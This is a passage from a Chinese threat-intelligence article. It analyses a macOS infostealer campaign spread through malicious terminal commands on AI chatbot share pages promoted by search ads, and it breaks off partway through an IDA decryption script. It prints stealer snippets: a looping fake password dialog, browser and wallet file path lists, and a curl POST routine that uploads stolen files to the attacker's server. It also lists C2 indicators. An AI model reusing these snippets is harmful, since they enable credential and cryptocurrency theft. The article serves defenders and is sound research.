0.2em;margin: 8px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;"><span leaf="">受害者画像：高价值目标的精准猎杀</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">通过对攻击链条及恶意代码行为的深度分析，我们发现该攻击活动展现出极其鲜明的目标偏好，受害者画像高度集中于以下特征：</span></p><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">高净值 MacOS 用户群体</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">恶意载荷针对 MacOS 系统进行了深度定制，重点窃取 Keychain 凭证、浏览器隐私数据及加密货币钱包密钥。由于 MacOS 在互联网、金融及高端制造产业的高渗透率，其主机内存储的私密信息往往具有极高的经济价值。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">重度依赖 AI 生产力的开发者与 IT 从业者</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">该群体日常工作中频繁使用搜索引擎解决复杂技术难题，对主流大模型平台有着极强的路径依赖，且习惯于在本地环境执行脚本。这种“高技术力”在特定场景下反而成为了防御短板——他们更倾向于相信 AI 给出的“一键式”技术方案，从而在无意中绕过了系统的安全预警。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">3. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">加密资产持有者与投资者</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">由于载荷内置了针对 MetaMask、Phantom 等数十种主流钱包插件及桌面钱包（如 Electrum、Exodus）的嗅探逻辑，这表明窃取数字货币资产是攻击者的核心获利动机。</span></p></li></ol><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">案例分析：针对 MacOS 空间清理需求的“定向投毒”</span></strong><span leaf=""><br/></span><span leaf="">如下图所示，攻击者利用不同大模型厂商分别生成了极具欺骗性的 MacOS 空间清理指南，精准诱导寻求设备优化方案的用户进入陷阱：</span></p><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img alt="攻击者利用 国内大模型厂商 生成的恶意 MacOS 清理指南" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027479" data-ratio="0.9561497326203209" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="935" src="https://wechat2rss.xlab.app/img-proxy/?k=eea7720e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXM8446etU9txZV53xxoSwHCNibprgowr2d3nXKJhurMqxIic6oqrgc6YiaL83g7rudHEGbibF2FNag2cR04PlkaZ3FDdDe3KbBNqc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: #888;font-size: 0.8em;"><span leaf="">攻击者利用 国内大模型厂商 生成的恶意 MacOS 清理指南</span></figcaption></figure><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img alt="针对同一需求在 国外大模型 平台上构建的恶意分享内容" class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027480" data-ratio="1.0444444444444445" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c9397d7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUBeQicn9Xxj4Kfaznp2I6SfFWPObALE1FfUVOFrWm9sIjYo8tKdsuytBYb3g9h4880Yru4KXtcZAXSh5CHRxMcBsu4pEPH2Auk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: #888;font-size: 0.8em;"><span leaf="">针对同一需求在 国外大模型 平台上构建的恶意分享内容</span></figcaption></figure><h2 data-heading="true" style="display: table;padding: 0px 0.2em;margin: 8px auto;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;"><span leaf="">攻击案例剖析：从“搜索”到“失陷”的隐形链条</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">攻击者通过精准的关键词竞价，将承载恶意代码的分享链接推送到搜索引擎的顶部广告位。以下是一个典型的受害者失陷全过程分析：</span></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgba(0, 82, 217, 1);margin: 2em 8px 0.75em 0;color: #3f3f3f;font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span leaf="">1. 流量劫持与官方链接诱导</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">当开发者尝试搜索“xxx Code 安装教程”等技术关键词时，搜索引擎首页的赞助商结果会展示指向的官方分享链接。由于域名的权威性，用户几乎没有任何防御心理便点击进入。</span></p><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027485" data-ratio="0.9462962962962963" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ded051bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVEJ5ISZOxgoricHakmly7gSsjC4983nft1Ar1QhbLbEFeAJCUEvjzRhvYzq4sicM5LsMUnXAXrcq4wiaPETNVRyRSm15ZuHWZSuM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgba(0, 82, 217, 1);margin: 2em 8px 0.75em 0;color: #3f3f3f;font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span leaf="">2. 恶意代码执行与初步渗透</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">在分享页面中，AI 生成的“指导建议”会要求用户在终端（Terminal）执行一段经过 Base64 混淆的指令。由于用户对平台对话逻辑的信任，往往会忽略对代码内容的审核。执行后，该指令会启动一个隐藏的下载任务。</span></p><span leaf="">后续受害者主机将从 C2 地址 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">contatoplus[.]com</span></code><span leaf=""> 拉取第二阶段的恶意代码。</span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027483" data-ratio="0.575925925925926" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d6ad4532&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUpGOWc683H2wfYz0YjSIAUOfChiaSCcbtwueHFlvIbibBxVMMjnK7sBIIJ0j7vl76gLCIKFj8pjGE4jxibeKBUGonESn7S9f9Fpo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgba(0, 82, 217, 1);margin: 2em 8px 0.75em 0;color: #3f3f3f;font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span leaf="">3. 全能型 MacOS 后门植入</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">关联分析显示，恶意载荷最终会从 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">45.94.47[.]204</span></code><span leaf=""> 加载一个功能完备的 MacOS 恶意后门（MD5: </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">a2c4aea6f5b6f32aa2ee5013da4094db</span></code><span leaf="">）。该后门采用 AppleScript (osascript) 编写，具备极其详尽的隐私嗅探能力：</span></p><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">社会工程学凭证窃取</span></strong><span leaf="">：通过伪造系统级的“系统偏好设置”对话框，循环弹窗诱导用户输入开机密码，实现权限提升或密钥链解锁。</span><pre style="color: #c9d1d9;background: #0d1117;font-size: 90%;overflow-x: auto;border-radius: 8px;line-height: 1.5;margin: 10px 8px;padding: 0 !important;"><span style="display: flex;padding: 10px 14px 0;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" x="0px" y="0px" width="45px" height="13px" viewBox="0 0 450 130"><ellipse cx="50" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)"></ellipse><ellipse cx="400" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)"></ellipse></svg></span><code style="font-size: 90%;border-radius: 4px;display: -webkit-box;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0;color: inherit;background: none;white-space: nowrap;margin: 0;"><span leaf="">on getpwd(username, writemind)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    repeat</span></span><span style="color: #ff7b72;"><span leaf="">        set</span></span><span leaf=""> result to display dialog</span><span style="color: #a5d6ff;"><span leaf=""> &#34;Required Application Helper.</span><span style="color: #c9d1d9;"><span leaf="">\n</span></span><span leaf="">Please enter password for continue.&#34;</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">            default</span></span><span leaf=""> answer</span><span style="color: #a5d6ff;"><span leaf=""> &#34;&#34;</span></span><span leaf=""> with icon caution buttons {</span><span style="color: #a5d6ff;"><span leaf="">&#34;Continue&#34;</span></span><span leaf="">}</span><span leaf=""><br/></span><span leaf="">            with title</span><span style="color: #a5d6ff;"><span leaf=""> &#34;System Preferences&#34;</span></span><span leaf=""> with hidden answer</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">        set</span></span><span leaf=""> password_entered to text returned of result</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">        if</span></span><span leaf=""> checkvalid(username, password_entered) then</span><span leaf=""><br/></span><span leaf="">            writeText(password_entered, writemind</span><span style="color: #79c0ff;"><span leaf=""> &amp;</span></span><span style="color: #a5d6ff;"><span leaf=""> &#34;pwd&#34;</span></span><span leaf="">)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">            return</span></span><span leaf=""> password_entered</span><span leaf=""><br/></span><span leaf="">        end</span><span style="color: #ff7b72;"><span leaf=""> if</span></span><span leaf=""><br/></span><span leaf="">    end</span><span style="color: #ff7b72;"><span leaf=""> repeat</span></span><span leaf=""><br/></span><span leaf="">end getpwd</span></code></pre></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">全平台浏览器数据洗劫</span></strong><span leaf="">：覆盖 Chrome、Edge、Brave、Arc 等几乎所有主流 Chromium 系浏览器，窃取 Cookie、自动填充数据及保存的明文密码。</span><pre style="color: #c9d1d9;background: #0d1117;font-size: 90%;overflow-x: auto;border-radius: 8px;line-height: 1.5;margin: 10px 8px;padding: 0 !important;"><span style="display: flex;padding: 10px 14px 0;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" x="0px" y="0px" width="45px" height="13px" viewBox="0 0 450 130"><ellipse cx="50" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)"></ellipse><ellipse cx="400" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)"></ellipse></svg></span><code style="font-size: 90%;border-radius: 4px;display: -webkit-box;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0;color: inherit;background: none;white-space: nowrap;margin: 0;"><span style="color: #ff7b72;"><span leaf="">set</span></span><span leaf=""> chromiumMap</span><span style="color: #ff7b72;"><span leaf=""> to</span></span><span leaf=""> {</span><span leaf=""><br/></span><span leaf="">    {</span><span style="color: #a5d6ff;"><span leaf="">&#34;Chrome&#34;</span></span><span leaf="">, library &amp;</span><span style="color: #a5d6ff;"><span leaf=""> &#34;Google/Chrome/&#34;</span></span><span leaf="">},</span><span leaf=""><br/></span><span leaf="">    {</span><span style="color: #a5d6ff;"><span leaf="">&#34;Arc&#34;</span></span><span leaf="">, library &amp;</span><span style="color: #a5d6ff;"><span leaf=""> &#34;Arc/&#34;</span></span><span leaf="">},</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    -- ... 以及其他 10 余款浏览器</span></span><span leaf="">}</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">set</span></span><span leaf=""> chromiumFiles</span><span style="color: #ff7b72;"><span leaf=""> to</span></span><span leaf=""> {</span><span style="color: #a5d6ff;"><span leaf="">&#34;/Network/Cookies&#34;</span></span><span leaf="">,</span><span style="color: #a5d6ff;"><span leaf=""> &#34;/Login Data&#34;</span></span><span leaf="">,</span><span style="color: #a5d6ff;"><span leaf=""> &#34;/Web Data&#34;</span></span><span leaf="">,</span><span style="color: #a5d6ff;"><span leaf=""> &#34;/Local Extension Settings/&#34;</span></span><span leaf="">}</span></code></pre></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">数字资产精准收割</span></strong><span leaf="">：内置针对 MetaMask、Binance、Coinbase 等 50 余款主流加密钱包插件的嗅探规则，并扫描本地 Electrum、Exodus 等桌面钱包数据库。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">敏感文件自动化回传</span></strong><span leaf="">：针对桌、文档及下载目录，自动化检索 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">.txt</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">.pdf</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">.key</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">.wallet</span></code><span leaf=""> 等后缀的文件，并将其压缩打包，通过 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">curl -X POST</span></code><span leaf=""> 方式渗漏至攻击者服务器。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 其他窃取目标</span></p></li></ul><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;max-width: 100%;overflow: auto;"><table style="color:#3f3f3f;margin-top:0 !important;min-width:165px;"><thead><tr><th data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">目标</span></p></th><th style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">路径</span></p></th></tr></thead><tbody><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">Keychain</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">~/Library/Keychains/login.keychain-db</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">Telegram</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">~/Library/Application Support/Telegram Desktop/tdata/</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">Firefox</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">~/Library/Application Support/Firefox/Profiles/</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">OpenVPN</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">OpenVPN Connect/profiles/</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">Apple Notes</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">NoteStore.sqlite</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">Binance</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">app-store.json</span></p></td></tr><tr><td data-colwidth="140" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">TonKeeper</span></p></td><td style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">config.json</span></p></td></tr></tbody></table></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">回传窃取数据代码如下</span></p><pre style="color: #c9d1d9;background: #0d1117;font-size: 90%;overflow-x: auto;border-radius: 8px;line-height: 1.5;margin: 10px 8px;padding: 0 !important;"><span style="display: flex;padding: 10px 14px 0;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" x="0px" y="0px" width="45px" height="13px" viewBox="0 0 450 130"><ellipse cx="50" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)"></ellipse><ellipse cx="400" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)"></ellipse></svg></span><code style="font-size: 90%;border-radius: 4px;display: -webkit-box;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0;color: inherit;background: none;white-space: nowrap;margin: 0;"><span style="color: #ff7b72;"><span leaf="">on</span></span><span leaf=""> send_data(attempt, gate, login, buildid, cl, cn)</span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">do shell script</span></span><span style="color: #a5d6ff;"><span leaf=""> &#34;curl -X POST &#34;</span></span><span leaf=""> &amp;</span><span style="color: #a5d6ff;"><span leaf=""><br/></span><span leaf="">&#34;-H \&#34;user: &#34;</span></span><span leaf=""> &amp; login &amp;</span><span style="color: #a5d6ff;"><span leaf=""> &#34;\&#34; &#34;</span></span><span leaf=""> &amp;</span><span style="color: #a5d6ff;"><span leaf=""><br/></span><span leaf="">&#34;-H \&#34;BuildID: &#34;</span></span><span leaf=""> &amp; buildid &amp;</span><span style="color: #a5d6ff;"><span leaf=""> &#34;\&#34; &#34;</span></span><span leaf=""> &amp;</span><span style="color: #a5d6ff;"><span leaf=""><br/></span><span leaf="">&#34;-F \&#34;file=@/tmp/out.zip\&#34; &#34;</span></span><span leaf=""> &amp;</span><span leaf=""><br/></span><span leaf="">gate &amp;</span><span style="color: #a5d6ff;"><span leaf=""> &#34;/contact&#34;</span></span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    -- 失败重试，最多 15 次，每次间隔 60 秒</span></span><span style="color: #ff7b72;"><span leaf="">    if</span></span><span leaf=""> attempt &lt;</span><span style="color: #79c0ff;"><span leaf=""> 15</span></span><span style="color: #ff7b72;"><span leaf=""> then</span></span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">        delay</span></span><span style="color: #79c0ff;"><span leaf=""> 60</span></span><span leaf=""><br/></span><span leaf="">        send_data(attempt +</span><span style="color: #79c0ff;"><span leaf=""> 1</span></span><span leaf="">, ...)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    end</span></span><span style="color: #ff7b72;"><span leaf=""> if</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">end</span></span><span leaf=""> send_data</span><span leaf=""><br/></span></code></pre><span leaf="">同时关联分析到一枚MacOS 二进制文件（deba7147df76bb068915fa0fd24c91c2），该文件作为解密器进一步解密执行恶意窃密脚本：</span><span leaf=""><br/></span><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027482" data-ratio="0.45925925925925926" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=87e427b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXUogGQyiaYagptVznyAZWQicm7YOAERbyeUwOrdtcEviaictqXRIHrpk6dEz7hIuox7IVrezWoRaRiabrpWL58a8ANVT98PlpTn9E8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><span leaf=""><br/></span><span leaf="">解密后的关键osascript脚本后通过popen执行，脚本详细 ida 插件解密逻辑如下：</span><pre style="color: #c9d1d9;background: #0d1117;font-size: 90%;overflow-x: auto;border-radius: 8px;line-height: 1.5;margin: 10px 8px;padding: 0 !important;"><span style="display: flex;padding: 10px 14px 0;"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" x="0px" y="0px" width="45px" height="13px" viewBox="0 0 450 130"><ellipse cx="50" cy="65" rx="50" ry="52" stroke="rgb(220,60,54)" stroke-width="2" fill="rgb(237,108,96)"></ellipse><ellipse cx="225" cy="65" rx="50" ry="52" stroke="rgb(218,151,33)" stroke-width="2" fill="rgb(247,193,81)"></ellipse><ellipse cx="400" cy="65" rx="50" ry="52" stroke="rgb(27,161,37)" stroke-width="2" fill="rgb(100,200,86)"></ellipse></svg></span><code style="font-size: 90%;border-radius: 4px;display: -webkit-box;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0;color: inherit;background: none;white-space: nowrap;margin: 0;"><span style="color: #ff7b72;"><span leaf="">import</span></span><span leaf=""> ida_bytes</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> read_dword</span></span><span leaf="">(</span><span leaf="">addr</span><span leaf="">):</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span leaf=""> ida_bytes.get_dword(addr)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> read_byte</span></span><span leaf="">(</span><span leaf="">addr</span><span leaf="">):</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span leaf=""> ida_bytes.get_byte(addr)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> hex_decode_from_bytes</span></span><span leaf="">(</span><span leaf="">b:</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">) -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 等价于 sub_100000D70 的逻辑（这里只保留核心：十六进制字符串 -&gt; bytes）</span></span><span leaf="">    s = b.decode(</span><span style="color: #a5d6ff;"><span leaf="">&#39;ascii&#39;</span></span><span leaf="">)</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 自动忽略可能末尾的 0</span></span><span leaf="">    s = s.rstrip(</span><span style="color: #a5d6ff;"><span leaf="">&#39;\x00&#39;</span></span><span leaf="">)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">.fromhex(s)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_string_like_sub_100001060</span></span><span leaf="">() -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    base1 =</span><span style="color: #79c0ff;"><span leaf=""> 0x100339C60</span></span><span leaf=""><br/></span><span leaf="">    base2 =</span><span style="color: #79c0ff;"><span leaf=""> 0x10033A460</span></span><span leaf=""><br/></span><span leaf="">    base_shift =</span><span style="color: #79c0ff;"><span leaf=""> 0x10033A260</span></span><span leaf=""><br/></span><span leaf="">    base_xor =</span><span style="color: #79c0ff;"><span leaf=""> 0x10033A060</span></span><span leaf=""><br/></span><span leaf="">    base_sub =</span><span style="color: #79c0ff;"><span leaf=""> 0x100339E60</span></span><span leaf=""><br/></span><span leaf="">    out_len =</span><span style="color: #79c0ff;"><span leaf=""> 137</span></span><span style="color: #8b949e;"><span leaf="">  # 对照函数里 *a1 = 137, a1[1] = 128，只用前 137 字节</span></span><span leaf=""><br/></span><span leaf="">    out =</span><span style="color: #ffa657;"><span leaf=""> bytearray</span></span><span leaf="">(out_len)</span><span leaf=""><br/></span><span leaf="">    v3 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    v4 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    v5 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    while</span></span><span leaf=""> v3 !=</span><span style="color: #79c0ff;"><span leaf=""> 512</span></span><span leaf="">:</span><span style="color: #8b949e;"><span leaf="">  # 128 * 4</span></span><span leaf=""><br/></span><span leaf="">        v6 = read_dword(base1 + v3) - read_dword(base2 + v3)</span><span leaf=""><br/></span><span leaf="">        shift = read_byte(base_shift + v3) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 7</span></span><span leaf=""><br/></span><span leaf="">        hi = (v6 &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf="">) &gt;&gt; shift</span><span leaf=""><br/></span><span leaf="">        lo = (v6 &lt;&lt; ((-shift) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 7</span></span><span leaf="">)) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf=""><br/></span><span leaf="">        b = ((read_byte(base_xor + v3) ^ (hi | lo)) - read_byte(base_sub + v3)) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf=""><br/></span><span leaf="">        out[v5] = b</span><span leaf=""><br/></span><span leaf="">        v4 = ((v5 ^ read_dword(base1 + v3)) + v4) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFFFFFFFF</span></span><span style="color: #8b949e;"><span leaf="">  # 这里不用 ROL 结果，只保持形式</span></span><span leaf=""><br/></span><span leaf="">        v5 +=</span><span style="color: #79c0ff;"><span leaf=""> 1</span></span><span leaf=""><br/></span><span leaf="">        v3 +=</span><span style="color: #79c0ff;"><span leaf=""> 4</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">        if</span></span><span leaf=""> v5 &gt;= out_len:</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">            break</span></span><span style="color: #ff7b72;"><span leaf="">    return</span></span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">(out)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_bytes_like_sub_100000F60</span></span><span leaf="">() -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    base1 =</span><span style="color: #79c0ff;"><span leaf=""> 0x100002680</span></span><span leaf=""><br/></span><span leaf="">    base2 =</span><span style="color: #79c0ff;"><span leaf=""> 0x10028B740</span></span><span leaf=""><br/></span><span leaf="">    base_shift =</span><span style="color: #79c0ff;"><span leaf=""> 0x1001E9310</span></span><span leaf=""><br/></span><span leaf="">    base_xor =</span><span style="color: #79c0ff;"><span 